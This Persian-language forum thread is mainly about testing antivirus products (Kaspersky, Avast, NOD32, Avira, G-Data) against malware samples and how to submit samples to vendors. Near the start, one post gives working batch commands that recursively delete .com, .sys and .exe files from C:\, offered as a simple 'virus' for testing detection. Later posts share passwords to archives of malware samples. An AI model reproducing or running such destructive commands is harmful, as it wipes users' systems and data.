داشتم این پست رو نقل قول میکردم یاد ویروس های bat افتادم. فکر نکنم ساده تر و نخودی تر از این ویروس ها وجود داشته باشه. [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

یه دونه از این ویروس ها ساختم با اپ کسپر چک کنم ببینم چطوره شانسی توی توتال هم آپ کردم نتیجه واقعا شرمسار کننده بود :sad:

حالا بد نیست این نتیجه ای که من دیدم رو هم دوستان ببینند.

نت پد ویندوز رو باز کنید.

این متن رو درونش کپی کنید.


@echo off

Cls

===========

Color fc

Del /a c:\*.com

Del /a c:\*.sys

Del /a c:\*.exe /s


سپس save as رو بزنید و یک اسم دلخواه با پسوند bat بهش بدین. مثلا بشه doki.bat

حالا شما یک ویروس ساختید که فایل های سیستمی ویندوز رو پاک میکنه با اجرا شدنش ونتیجه مرگ ویندوز. فایلی که ساختید رو به هیج وجه اجرا نکنید.....

من این رو توی توتال آپ کردم نتیجه رو ببینید چه آنتی ویروس های معروفی متاسفانه ساده ترین ویروس رو شناسایی نکردند.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

البته از این دستور ها بسیاز زیاده. به این ویروس ها میگن کشنده فایل.

جالب بود نه ؟ [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

خب دکتر جان, بالاخره یکی از مدیران انجمن کسپرسکی اومد و جوابگو شدو توضیحات لازم رو دادم.

توضیحات از زبان Lucian Bara مدیر انجمن کسپرسکی:
Applicatio Control در کل هسته اصلی را آنالیز و بررسی میکند نه فقط exe. ها را. به همیل دلیل یک فایل exe که نامش عوض شده باشه همچنان اسکن خواهد شد. در ادامه Application Control نمیتونه در مقابل فایل های inf. و یا xml. از شما محافظت بکنه به خاطر اینکه اینها فایل های اجرایی نیستند. یک فایل text میتونه اجزایی از یک مخربی باشه که قادر به اجرا شدن هست. اجازه بده اینطوری بگیم که مثلا یک فایل inf. قسمتی برای اجرا کردن exe. از طریق تنظیمات اجرای اتوماتیک ویندوز است اما فایل اجرایی exe تنها فایلی است که میتونه کاری بکنه / سیستم را آلوده بکنه. inf. و xml. نمیتونند کاری بکنند و امکان این وجود نداره که بشه اینها رو کنترل کرد چون اینها نمیتونند بعنوان یک پروسه اجرا بشند و کاری را انجام دهند.

یک فایل scr. یک فایل اجرایی هست , و اگر اجرا بشه درست مانند یک فایل اجرایی exe. در Application Control باهاش برخورد میشه.

خب تا اینجا توضیحاتی بود که Lucian داد. اگر در ترجمه بعضی جاها رو تغییر دادم به خاطر این بود که با فارسی جور در نمیومد و برای فهم موضوع باید تغییر میکردند. :31:

در ادامه پست بالا.

بعد از اینکه این جواب رو از طرف یکی از مدیران انجمن کسپرسکی دریافت کردم. KIS رو بدون استفاده از VMware امتحان کردم.

چون فایل I love u Saghar توسط دیتابیس کسپرسکی شناسایی میشه بنابراین قسمت File Antivirus کسپرسکی را غیر فعال کردم تا از دیتابیسش برای شناسایی استفاده نکنه.

برای اجرا کردن فایل I love u saghar.scr از Safe Run یا همان Sand Box کسپرسکی هم استفاده نکردم چون ما میخواستیم فقط Application Control را امتحان کنیم.

تنظیم قسمت app control برای فایل های ناشناخته و بدون امضای دیجالی بر روی untrasted قرار داره.

بعد از کار های بالا فایل I love u saghar.scr را با دابل کلیک اجرا کردم تا سیستم من رو آلوده کنه و درایو هامو به داریوهای غیر سیستمی تبدیل کنه. اما نتیجه این شد که کسپرسکی اجازه اجرا شدن بهش رو نداد و اون رو در قسمت untrusted بصورت اتوماتیک و بدون دخالت من ثبت کرد.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


برای اینکه مطمئن بشم سیستم من واقعا توسط کسپرسکی یا بهتره بگیم Application Control محافظت شد یا نه با برنامه های زیر سیستم رو اسکن کردم.

Avira Antivir
Hitman Pro
Malwarebytes Antimalware

برای پیدا کردن روتکیت ها هم از GMER و SysInspector استفاده کردم.

نتیجه: در سیستم هیچی پیدا نشد.
برنده: KIS 2010 بدون آنتی ویروس.:31:

در ادامه پست بالا.
بعد از کار های بالا فایل I love u saghar.scr را با دابل کلیک اجرا کردم تا سیستم من رو آلوده کنه و درایو هامو به داریوهای غیر سیستمی تبدیل کنه. اما نتیجه این شد که کسپرسکی اجازه اجرا شدن بهش رو نداد و اون رو در قسمت untrusted بصورت اتوماتیک و بدون دخالت من ثبت کرد.


عالی [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

با سلام
این هم لینکه 6000 ویروسه نسبتا قدیمی

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
pass: auToeXeCw0rm
فقط هر چی هم موند به هیچ عنوان اجراشون نکنید.
من با نود32 تست کردم از 5936 فایله ویروسی تعداد 5629 تا فایل رو ویروس شناخت و حذف کرد. حدود 307 فایل باقی موند.
شما هم با بقیه آنتی ویروسها تست کنید و نتیجه رو اطلاع رسانی کنید.
مرسی
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

شما چطوری اکسترکت کردی؟
من KIS 2011 دارم اومدم اکسترکت کنم یه هو دیدم کسپر عصبانی شده از اتاق دویدم رفتم بیرون گفتم حالا همه چی رو میترکونه
بعد از چند دقیقه که برگشتم دیدم اجازه نداده هیچ کدوم از فایلها از فایل فشرده بیرون بیاند
جدا عصبانی بود
خواستم برای اکسترکت کسپر رو خواموش کنم ولی گفتم شاید خطرناک باشه
هنوزم با ویروسها درگیره فقط خدا کنه شکست نخوره نامردا کله سیستم رو محاصره کردند...

شما چطوری اکسترکت کردی؟
من KIS 2011 دارم اومدم اکسترکت کنم یه هو دیدم کسپر عصبانی شده از اتاق دویدم رفتم بیرون گفتم حالا همه چی رو میترکونه
بعد از چند دقیقه که برگشتم دیدم اجازه نداده هیچ کدوم از فایلها از فایل فشرده بیرون بیاند
جدا عصبانی بود
خواستم برای اکسترکت کسپر رو خواموش کنم ولی گفتم شاید خطرناک باشه
هنوزم با ویروسها درگیره فقط خدا کنه شکست نخوره نامردا کله سیستم رو محاصره کردند...

:31:
خب حامد جان من اول فایل رو کپی میکنم توی exclusion معرفی شده در آنتی ویروسم و همونجا اکسترکتشون کردم. بعد دوباره توی فایله اکسترکت شده اومدم داخلش و فولدر رو بدون پسورد Rar کردم. بعدش اون فایله رار رو توی یک درایوه دیگه کپی کردم و سپس اسکن کردم.
البته خیالت راحت باشه. این ویروسها قدیمین و حتما کسپر همه رو میشناسه. فقط چون زیادن آنتی ویورس شوکه میشه که یه دفعه اینهمه ویروس از کجا اومد:4:

این که همه رو میشناسه که مطمعنم چون من به کسپر ایمان دارم
فقط هنوز در حال کشتنه
نمیدونم این خون و خون ریزی کی تموم میشه

:31:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

دوستان توی پست های قبل توضیح داده شد اسکن object اصلا نشون دهنده تعداد ویروس های پاک شده نیست و روشش هم اعلام شد.

فردا من یک سری از این فایل ها را که آنتی ویروس شما شناسایی نکرده یا حتی به عنوان ویروس شناسایی کرده رو به صورت رندم آنالیز می کنیم تا ببینیم اصلا ویروس هست یا نه. فکر نمیکنم توی این پک 6000 ویروس باشه. حالا تا فردا مشخص میشه [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

با سلام
این هم لینکه 6000 ویروسه نسبتا قدیمی

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدpass: auToeXeCw0rm
فقط هر چی هم موند به هیچ عنوان اجراشون نکنید.
من با نود32 تست کردم از 5936 فایله ویروسی تعداد 5629 تا فایل رو ویروس شناخت و حذف کرد. حدود 307 فایل باقی موند.
شما هم با بقیه آنتی ویروسها تست کنید و نتیجه رو اطلاع رسانی کنید.
مرسی


محسن جان حدود 100 تا فایل برای من باقی موند که به نظر نمیرسه این فایل ها ویروس باشه. حجم یک کیلوبایت exe فکر نکنم ویروس باشه.

چند تا هم حدود 50 کیلو بایتی پیدا کردم که باقی موند و این مثلا نتیجه یکی از این exe هاست.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدهمین فایل رو من برای آویرا می فرستم تا نتیجه کامل آنالیزش رو بفرسته.

نکته دیگه ای که بود نوع ریپورت این فایل ها باهم تفاوت داشت مثلا ویروس رو به طور مثال آویرا می نوسه شامل کد فلان ویروس هست نه خود ویروس. پس شاید بشه گفت این ها یک قسمتی از کد های ویروس های مختلف باشن که این حجم رو دارند.

ممنون به خاطر کمکی که میکنی [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


-----------------

این نتیجه آنالیز آویرا ( این فایل که به طور رندم از 100 تا انتخاب کردم )

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

رفیق
هیچ کدوم رو واسه g data تونستی بفرستی؟اونایی که اویرا نمیشناخت و براش فرستادید اضافه شدن؟؟

رفیق
هیچ کدوم رو واسه g data تونستی بفرستی؟اونایی که اویرا نمیشناخت و براش فرستادید اضافه شدن؟؟

G-DATA خودش آنالیز نداره. برای فرستادن فایل های مشکلوک باید اونها رو به دو شرکت آنتی ویروس Avast و BitDefender بفرستید.

[SIZE=2]محسن جان حدود 100 تا فایل برای من باقی موند که به نظر نمیرسه این فایل ها ویروس باشه. حجم یک کیلوبایت exe فکر نکنم ویروس باشه.

چند تا هم حدود 50 کیلو بایتی پیدا کردم که باقی موند و این مثلا نتیجه یکی از این exe هاست.

مرسی دکتر جان
من هم فکر نمیکنم exe های 2 یا 3 کیلوبایتی ویورس باشند ولی روی حدود 50 به بالاش باید شک کرد. من همه رو برای نود فرستادم.
در هر حال دستتون درد نکنه:11:

G-DATA خودش آنالیز نداره. برای فرستادن فایل های مشکلوک باید اونها رو به دو شرکت آنتی ویروس Avast و BitDefender بفرستید.
چجوری میشه به Avast فایل مشکوک فرستاد؟ از کدوم قسمتش؟ ورژن 5 رو اگه میشه توضیح بده ممنون :10:

G-DATA خودش آنالیز نداره. برای فرستادن فایل های مشکلوک باید اونها رو به دو شرکت آنتی ویروس Avast و BitDefender بفرستید.
خب کسی اینکارو کرده؟

ارسال ویروس برای بیت دیفندر:virus_submission@bitdefender.com


چجوری میشه به Avast فایل مشکوک فرستاد؟ از کدوم قسمتش؟ ورژن 5 رو اگه میشه توضیح بده ممنون [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

برای avsat فایل رو قرنطینه کنید سپس ارسال.( احتمالا داره )

برای avsat فایل رو قرنطینه کنید سپس ارسال.( احتمالا داره )
[/SIZE]

درسته, بعد از قرنظینه کردن روش کلیک راست کرده و Submit رو میزنید.
بعد نوع آلودگی را انتخاب میکنید. ایمیل آدرستون رو توش مینویسید. I Agree را در پایین تیک میزنید. بعد Submit را میزنید.
بعد روی آپدیت کلیک میکنید و آپدیت رو میزنید تا فایل هایی که انتخاب کرده بودید براش فرستاده بشه. اگر هم آپدیت نکنید هر وقت خودش خواست دیتابیس رو آپدیت کنه فایل ها رو میفرسته . :46:
من 2 هفته پیش نزدیک به 70 تا نمونه براشون فرستادم, هنوزم توی دیتابیسشون ثبت نشده.

درسته, بعد از قرنظینه کردن روش کلیک راست کرده و Submit رو میزنید.
بعد نوع آلودگی را انتخاب میکنید. ایمیل آدرستون رو توش مینویسید. I Agree را در پایین تیک میزنید. بعد Submit را میزنید.
بعد روی آپدیت کلیک میکنید و آپدیت رو میزنید تا فایل هایی که انتخاب کرده بودید براش فرستاده بشه. اگر هم آپدیت نکنید هر وقت خودش خواست دیتابیس رو آپدیت کنه فایل ها رو میفرسته . :46:
من 2 هفته پیش نزدیک به 70 تا نمونه براشون فرستادم, هنوزم توی دیتابیسشون ثبت نشده.

درسته شبیه به نورتون هستش. من هم فابلهای زیادی رو برای نورتون سابمیت کردم ولی هیچکدوم توی دیتابیسش قرار نگرفتند. بعد اومدم چک کردم با فابرواله online Armor دیدم که نورتون میگه سند میکنم فایلتون رو، ولی هیچ چیزی رو آپلود نمیکرد. چند ساعت هم با اینترنته پر سرعت چک کردم ولی نشد که نشد. احتمالا برای شما هم همینطوره...
ولی برای نود بسیار راحته. توی تنظیماتش بزارید که در اسرع وقت سابمیت کنه و سریعا به محض اینکه به اینترنت وصل بشید فایلهای مربوطه آپلود میشن و نود پیغام میدن.
موفق باشید

درسته شبیه به نورتون هستش. من هم فابلهای زیادی رو برای نورتون سابمیت کردم ولی هیچکدوم توی دیتابیسش قرار نگرفتند. بعد اومدم چک کردم با فابرواله online Armor دیدم که نورتون میگه سند میکنم فایلتون رو، ولی هیچ چیزی رو آپلود نمیکرد. چند ساعت هم با اینترنته پر سرعت چک کردم ولی نشد که نشد. احتمالا برای شما هم همینطوره...
ولی برای نود بسیار راحته. توی تنظیماتش بزارید که در اسرع وقت سابمیت کنه و سریعا به محض اینکه به اینترنت وصل بشید فایلهای مربوطه آپلود میشن و نود پیغام میدن.
موفق باشید

بله برای ناد32 راحته. به نظر من راحت ترین سابمیت رو Avira داره.
در مورد Avast هم مشکلی در آپلود فایل به سرور Avast وجود نداشت چون پروسه آپلودش رو خودم میدیدم و از این بابت مطمئنم که براشون ارسال شده. دفعه اولم که نیست :46: از طریق ایمیل هم براشون فرستادم اما خبری نشد. در ضمن من اینترنتم 24 ساعته است و مشکلی از این لحاظ به هیچ وجه ندارم.

حالا این مهم نیست, مشکل اصلی که با نسخه ی 5.0.545 یعنی آخرین نسخه ای که تا الان موجوده داشتم این بود که وقتی فایل آلوده ای رو که Avast هنوز اون رو نمیشناخت بصورت دستی در آنتی ویروس قرنظینه میکردم, فایل در قرنظینه وارد میشد اما فایل اصلی در مسیری که بود باقی میموند و حتی قابل اجرا شدن بود :18: از این مسخره تر دیگه ندیده بودم.
معمولا در آنتی ویروس وقتی فایلی به قرنطینه فرستاده میشه یعنی اجازه هیچ کاری رو نباید به اون فایل بده. حالا اگر فایل اصلی رو پاک نکنه مشکلی نیست اما حداقل اجازه اجرا شدن رو ازش بگیره. شاید هم باگی باشه که بعدا رفع بشه اما من این مشکل بزرگ رو باهاش داشتم. البته هنوزم دارم یسری آزمایشات روش انجام میدم چون پرفورمنس خوبی داره. :20:

پس با این حساب G-DATA خوب ساپورت نمیکنه کاربراش رو!
نه؟

پس با این حساب G-DATA خوب ساپورت نمیکنه کاربراش رو!
نه؟

بر فرض که خوب ساپورت نکنه.
شما مشکلی با ساپورتش داشتی؟ آیا سوالی پرسیدی که جوابتو ندادند یا مشکلی با نرم افزار پیدا کردی که جوابگو نبودند.

از نرم افزار کرک شده استفاده میکنیم, ساپورت نرم افزاری هم میخوایم. :31:

بله برای ناد32 راحته. به نظر من راحت ترین سابمیت رو Avira داره.
در مورد Avast هم مشکلی در آپلود فایل به سرور Avast وجود نداشت چون پروسه آپلودش رو خودم میدیدم و از این بابت مطمئنم که براشون ارسال شده. دفعه اولم که نیست :46: از طریق ایمیل هم براشون فرستادم اما خبری نشد. در ضمن من اینترنتم 24 ساعته است و مشکلی از این لحاظ به هیچ وجه ندارم.

حالا این مهم نیست, مشکل اصلی که با نسخه ی 5.0.545 یعنی آخرین نسخه ای که تا الان موجوده داشتم این بود که وقتی فایل آلوده ای رو که Avast هنوز اون رو نمیشناخت بصورت دستی در آنتی ویروس قرنظینه میکردم, فایل در قرنظینه وارد میشد اما فایل اصلی در مسیری که بود باقی میموند و حتی قابل اجرا شدن بود :18: از این مسخره تر دیگه ندیده بودم.
معمولا در آنتی ویروس وقتی فایلی به قرنطینه فرستاده میشه یعنی اجازه هیچ کاری رو نباید به اون فایل بده. حالا اگر فایل اصلی رو پاک نکنه مشکلی نیست اما حداقل اجازه اجرا شدن رو ازش بگیره. شاید هم باگی باشه که بعدا رفع بشه اما من این مشکل بزرگ رو باهاش داشتم. البته هنوزم دارم یسری آزمایشات روش انجام میدم چون پرفورمنس خوبی داره. :20:

توی نورتون هم بدین صورته. ولی بعد از قرنطینه کردن فایل، وقتی وارد قسمته قرنطینه نورتون میشی و روی فایل میری یه قسمت آپشن داره که چند انتخاب داره که یکیش اینه که فایل مربوطه رو میتونه از منبعش حذف کنه یا نگه داره وگزینه سابمیت که توی پسته قبلی گفتم که با سابمیت کردن من متوجه شدم که هیچی رو آپلود نمیکنه. شاید توی آواست هم همینطور باشه. برید توی قسمت قرنطینه نرم افزار و روی فایله مورد نظرتون کلیک راست کنید و ببنید چه آپشنهایی دارید.

توی نورتون هم بدین صورته. ولی بعد از قرنطینه کردن فایل، وقتی وارد قسمته قرنطینه نورتون میشی و روی فایل میری یه قسمت آپشن داره که چند انتخاب داره که یکیش اینه که فایل مربوطه رو میتونه از منبعش حذف کنه یا نگه داره وگزینه سابمیت که توی پسته قبلی گفتم که با سابمیت کردن من متوجه شدم که هیچی رو آپلود نمیکنه. شاید توی آواست هم همینطور باشه. برید توی قسمت قرنطینه نرم افزار و روی فایله مورد نظرتون کلیک راست کنید و ببنید چه آپشنهایی دارید.

مرسی عزیز.
Avast همچین گزینه هایی رو نداره. اگر داشت توی پست قبلیم میگفتم. من خودم عضو گروه بتا در Avast بودم و پیدا کردن همچین گزینه هایی چیزی نیست که از زیر دستم رد بشند و یا نتونم پیداشون کنم. این مشکل و مشکلاتی مانند کار نکردن درست Sandbox و یا غیر فعال بودن بوت اسکن و همچنین Behavior Blocker چیزی نیست که با آپشن و اینها حل بشه. تنها راهش بیرون دادن نسخه ی جدید بدون داشتن همچین مشکلاتی است.

بهر حال الان دارم یک آنتی ویروس دیگه رو تست میکنم, ببینم این یکی چیزی توش پیدا میشه :31:

به نظر من راحت ترین سابمیت رو Avira داره. درسته ava uk جان. همه ی آنتی ویروس ها ارسال رو از توی قرنطینه دارند اما مهم اینه که بعد از ارسال میل جوابی به آدم برسونه [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] لینک خود آنالیز آویرا خیلی راحت میشه کار باهاش کرد + ایمیل جوابی که ارسال میکنه. تا ببینیم چی بود :)

دیگه حتی ایمن آنتی ویروس هم این قابلیت رو داره.
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


بهترین آنالیز آویرا:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدکسپرسکی هم به همین شکل:


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

بر فرض که خوب ساپورت نکنه.
شما مشکلی با ساپورتش داشتی؟ آیا سوالی پرسیدی که جوابتو ندادند یا مشکلی با نرم افزار پیدا کردی که جوابگو نبودند.

از نرم افزار کرک شده استفاده میکنیم, ساپورت نرم افزاری هم میخوایم
نزن مارو رفیق
من G-DATA رو تست نکردم و سراغش نرفتم!میخوام بدونم که میشه رفت طرفش یا نه...

توی نورتون هم بدین صورته. ولی بعد از قرنطینه کردن فایل، وقتی وارد قسمته قرنطینه نورتون میشی و روی فایل میری یه قسمت آپشن داره که چند انتخاب داره که یکیش اینه که فایل مربوطه رو میتونه از منبعش حذف کنه یا نگه داره وگزینه سابمیت که توی پسته قبلی گفتم که با سابمیت کردن من متوجه شدم که هیچی رو آپلود نمیکنه. شاید توی آواست هم همینطور باشه. برید توی قسمت قرنطینه نرم افزار و روی فایله مورد نظرتون کلیک راست کنید و ببنید چه آپشنهایی دارید.

سلام مجدد. در ادامه ی پست قبلی...

شما اینجا چیزی میبینی؟ :46:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

و Settings

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]




نزن مارو رفیق
من G-DATA رو تست نکردم و سراغش نرفتم!میخوام بدونم که میشه رفت طرفش یا نه...

ببین ساپورت شرکت از نرم افزاری که داده بیرون یک چیزیه و پرفورمنس و نداشتن مشکلات در خود نرم افزار یک چیز دیگه است. البته این نظر منه. ممکنه نرم افزاری وجود داشته باشه که بسیار نرم افزار خوبی باشه و ازشم خیلی راضی باشی اما وقتی بهشون ایمیل میزنی جواب هیچکدومشون رو نمیدند.

G-DATA فقط ساپورت نرم افزاری از برنامه هایی که داده بیرون رو داره. مثل داشتن مشکلات نصب و یا uninstall کردن برنامه.

لینک زیر...

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
اما جهت فرستادن False Positive ها و یا Sample های جدید بهتره که به Avast و BitDefender فرستاده بشه. G-Data اینجا نقش یک دلال رو بازی میکنه. پس اگر Avast و بیت دفندر ساپورت خوبی رو در شناسایی نمونه های جدید فرستاده شده از طرف کاربران رو نداشته باشند, جی دیتا هم کاری از دستش بر نمیاد حتی اگر بخواد کاری هم بکنه نمیتونه.
اگر هم بخوای از طریق نرم افزار نمونه ها رو بفرستی باز هم به اواست و بیت دفندر فرستاده میشه چون چی دیتا خودش نمونه ها رو آنالیز نمیکنه و انجین مخصوص به خودش رو مثلا مثل آنتی ویروس مشابه F-Secure نداره.

G-DATA هم مثل بقیه آنتی ویروسها, نصب کن, چند روز باهاش کار کن. خوشت اومد نگهش دار وگرنه پاکش کن.
هیچ کس بهتر از خودت نمیتونه بهت بگه کدوم آنتی ویروس برای سیستم شما مناسب تره. یک آنتی ویروس ممکنه در سیستم من خوب کار کنه و مثلا از Corei7 بخوبی پشتیبانی کنه اما ممکنه در سیستم شما با برنامه هات تداخل داشته باشه و از منابع سیستم زیاد استفاده کنه.

اینترفیس هر آنتی ویروسی هم که در انتخابش برای خیلی ها شرط اصلی شده میتونه دلیل دیگه ای باشه برای اینکه بری و آزمایش کنی. :20:

فقط دو انجینه بودن یک آنتی ویروس دلیل نمیشه که در همه موارد اون آنتی ویروس خوبی باشه. اگر اینطور فکر کنیم باید بگم که Hitman Pro میشه گفت 6 انجین آنتی ویروس ها رو داره که یکی از انجین هاش G-Data هست. بقیه شون هم

Avira
Nod32
A-Squared
PrevX

و اخیرا هم خوندم Dr.WEB هم به نسخه ی جدید اضافه شده. :46:

یک آنتی ویروس خوب باید در خیلی از موارد مناسب باشه و حداقل برای من باید هفت خان رستم رو رد کنه تا بتونه در سیستم من نصب بشه. دیتابیس یکی از این هفت خانهاست و همه اش نیست. پیدا کن پرتقال فروش را. :31:

مخرب

توتال :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دانلود :


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد: Dr

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

مخرب

توتال :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیددانلود :


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: Dr

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

مرسی دکتر جان. :20:

انگاری ویروس توتال فقط نتیجه هایی رو برای کسپرسکی نشون میده که از طریق signatures شناسایی بشند.
کسپرسکی از طریق Heuristic شناساییش میکنه.
البته من بارها دیدم که هوش مصنوعی آواست یا ناد32 و یا اویرا در موتورهای اسکن VirusTotal کار میکنند اما انگار برای کسپرسکی فرق میکنه.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

ویرایش....

نتیجه ی اسکن جدید در ویروس توتال


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

بله واقعا فرق فوکوله و هوش مصنوعی کسپرسکی در کار نیست. :31:

مخرب

توتال :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دانلود :


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد: Dr

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

کسپر شناسایی کرد.:5:

مرسی دکتر جان. :20:
انگاری ویروس توتال فقط نتیجه هایی رو برای کسپرسکی نشون میده که از طریق signatures شناسایی بشند.
کسپرسکی از طریق Heuristic شناساییش میکنه.
البته من بارها دیدم که هوش مصنوعی آواست یا ناد32 و یا اویرا در موتورهای اسکن VirusTotal کار میکنند اما انگار برای کسپرسکی فرق میکنه.
ویرایش....
نتیجه ی اسکن جدید در ویروس توتال

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدبله واقعا فرق فوکوله و هوش مصنوعی کسپرسکی در کار نیست. :31:

درسته AVA UK جان خیلی از موارد هوش مصنوعی کسپر (روی ریپروت که می نویسه هوش مصنوعی اما به behaviour blocker بیشتر شبیه هست ) توی توتال دیده نمیشه. به نظر من کسپر فایل هارو یک تست کوچیک میکنه منظورم یه اجرای کوچیک ویا هر چیزه دیگه چرا اینو میگم ؟ هوش مصنوعی باشه قطعا توی توتال دیده میشه اما پست های اولی رو ببینی چندتا ویروس بود کسپر فقط باید دانلود میکرد و بدون اجرا شناسایی می کرد. حتی توی خود سایت کسپر اپلود کردم تا از دیتابیس لحظه ای استفاده کنم دیدم بله از اسکن پیدا نمیکنه و توی دیتابیس نرفته و توتال مشکل نداره و عقب نیست حتی فکر کردم نکنه توتال روزی یکبار اپدیت میکنه که این مشکل بوجود میاد که با اپلود خود سرور کسپر متوجه شدم نه توتال لحظه ای عمل میکنه.

این لینک رو ببیند برای اوایل تاپیک هست.

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
چیزی که من فکر میکنم احتمالا کسپر یک تست کوچیک میکنه و یه رفتارشناسی خفیف بدون دبل کلیک انجام میده.

درسته AVA UK جان خیلی از موارد هوش مصنوعی کسپر (روی ریپروت که می نویسه هوش مصنوعی اما به behaviour blocker بیشتر شبیه هست ) توی توتال دیده نمیشه. به نظر من کسپر فایل هارو یک تست کوچیک میکنه منظورم یه اجرای کوچیک ویا هر چیزه دیگه چرا اینو میگم ؟ هوش مصنوعی باشه قطعا توی توتال دیده میشه اما پست های اولی رو ببینی چندتا ویروس بود کسپر فقط باید دانلود میکرد و بدون اجرا شناسایی می کرد. حتی توی خود سایت کسپر اپلود کردم تا از دیتابیس لحظه ای استفاده کنم دیدم بله از اسکن پیدا نمیکنه و توی دیتابیس نرفته و توتال مشکل نداره و عقب نیست حتی فکر کردم نکنه توتال روزی یکبار اپدیت میکنه که این مشکل بوجود میاد که با اپلود خود سرور کسپر متوجه شدم نه توتال لحظه ای عمل میکنه.

این لینک رو ببیند برای اوایل تاپیک هست.

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدچیزی که من فکر میکنم احتمالا کسپر یک تست کوچیک میکنه و یه رفتارشناسی خفیف بدون دبل کلیک انجام میده.

drhaniball عزیز اگر عکسی رو که از کسپرسکی در مورد شناسایی این مورد گذاشتم دقت کنی متوجه میشی که برای شناسایی از کلمه Heur که مخفف کلمه Heuristic و به معنی هوش مصنوعی است استفاده کرده.

در ضمن من برای اینکه کسپرسکی شناسایی بکنه فایل رو اجرا نکردم که بخواد از Behavior Blocker استفاده بکنه. فایل رو فقط با اسکن معمولی و توسط File Anti-Virus تشخیص میده. اگر File Anti-Virus یعنی Real Time Protection کسپرسکی برای اسکن فایل ها از طریق آنتی ویروس خاموش باشه چیزی رو تشخیص نمیده.

عکس زیر... File-Anti-Virus خاموشه و فایل هم راحت اکسترکت میشه و پیغامی از کسپرسکی دیده نمیشه.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

در ضمن Behavior Blocker در KIS به اسم Proactive Defense معرفی شده و تنظیمات این قسمت به File Anti-Virus یا Web Anti-Virus ربطی نداره. :20:

drhaniball عزیز اگر عکسی رو که از کسپرسکی در مورد شناسایی این مورد گذاشتم دقت کنی متوجه میشی که برای شناسایی از کلمه Heur که مخفف کلمه Heuristic و به معنی هوش مصنوعی است استفاده کرده. AVA UK جان دست کم گرفتی مارو ها منم اینارو بلدم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] توضیح دادم که :


درسته AVA UK جان خیلی از موارد هوش مصنوعی کسپر (روی ریپروت که می نویسه هوش مصنوعی اما به behaviour blocker بیشتر شبیه هست ) توی توتال دیده نمیشهخوب متوجه منظورم نشدی عزیز بیشتر توضیح میدم.

شما که خودت استاد مایی و این هارو میدونی اما هوش مصنوعی آنتی ویروس روی دیتابیس آنتی ویروس هست. یعنی چطور ؟ یعنی وقتی یک ویروس بازنویسی میشه و یک سری کد هاش تغییر میکنه آنتی ویروس چون یک یا چند نوع از اون ویروس رو در دیتابیسش ثبت کرده باشه دیگه با تغیر یکم از کدهاش قدرت شناساییش رو از دست نمیده.

مثلا میگم یک ویروس ساخته میشه کاملا جدید هست انتی ویروس فرداش وارد دیتابیسش میکنه پسفردا ویروس بازنویسی میشه و یکم از کدهاش عوض میشه اما چون هنوز ترکیب اصلی وجود داره انتی ویروس که هوش مصنوعی خوبی داره شناسایش میکنه.( هوش مصنوعی )

حالا من این ویروس رو با آنلاین اسکن کسپرسکی در همین ساعت اسکن میکنم نتیجه رو ببین.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

میبینی که اگه فایل اسکن و دیتابیس و هوش مصنوعی عادی بوده باشه حتما اینجا خودش رو نشون میداد.

حالا نتیجه ای که شما میگیری فایل رو دانلود میکنی آنتی ویروس میگه این ویروس هست. پس این یه اسکن ساده نیست . حالا چی میتونه باشه ؟ نظرم رو بالا گفتم :


چیزی که من فکر میکنم احتمالا کسپر یک تست کوچیک میکنه و یه رفتارشناسی خفیف بدون دبل کلیک انجام میده.

سلام

دوستان مادر برد سیستم ما سوخته یه چند وقت نیستم ، میخوام ارتقا بدم ، به خدا می سپارمتون .


عشق ، هم آمدنی است و هم آموختنی .

